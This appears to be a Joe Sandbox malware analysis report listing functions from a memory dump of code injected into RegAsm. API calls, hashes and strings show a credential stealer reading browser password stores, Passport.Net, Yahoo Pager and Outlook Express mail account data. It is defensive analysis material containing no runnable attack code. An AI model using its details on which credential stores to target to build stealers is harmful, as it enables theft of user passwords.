                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                • API String ID: 2221118986-3608744896
                                                                                                                                                                                • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                  • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmpmemcpy
                                                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                • API String ID: 1784268899-4153596280
                                                                                                                                                                                • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                                • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                                Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                                                • memset.MSVCRT ref: 00410246
                                                                                                                                                                                • memset.MSVCRT ref: 00410258
                                                                                                                                                                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3974772901-0
                                                                                                                                                                                • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                                • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 577244452-0
                                                                                                                                                                                • Opcode ID: ac10a7bfd6aa15ede9b4e30c5e41de0da6501438f2188e8c3f6963eddb478c57
                                                                                                                                                                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                • Opcode Fuzzy Hash: ac10a7bfd6aa15ede9b4e30c5e41de0da6501438f2188e8c3f6963eddb478c57
                                                                                                                                                                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                • String ID: imap$pop3$smtp
                                                                                                                                                                                • API String ID: 2025310588-821077329
                                                                                                                                                                                • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                • API String ID: 2726666094-3614832568
                                                                                                                                                                                • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1786725549-0
                                                                                                                                                                                • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcmp.MSVCRT ref: 00406151
                                                                                                                                                                                  • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                • memcmp.MSVCRT ref: 004061A4
                                                                                                                                                                                • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                • String ID: global-salt$password-check
                                                                                                                                                                                • API String ID: 231171946-3927197501
                                                                                                                                                                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                • Opcode ID: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                                                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                • Opcode Fuzzy Hash: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 19018683-0
                                                                                                                                                                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                  • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                • memset.MSVCRT ref: 00444978
                                                                                                                                                                                • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset$strlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2142929671-0
                                                                                                                                                                                • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                • String ID: Passport.Net\*
                                                                                                                                                                                • API String ID: 2053021465-3671122194
                                                                                                                                                                                • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                • String ID: Personalities
                                                                                                                                                                                • API String ID: 2103853322-4287407858
                                                                                                                                                                                • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00444573
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                • API String ID: 1830152886-1703613266
                                                                                                                                                                                • Opcode ID: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
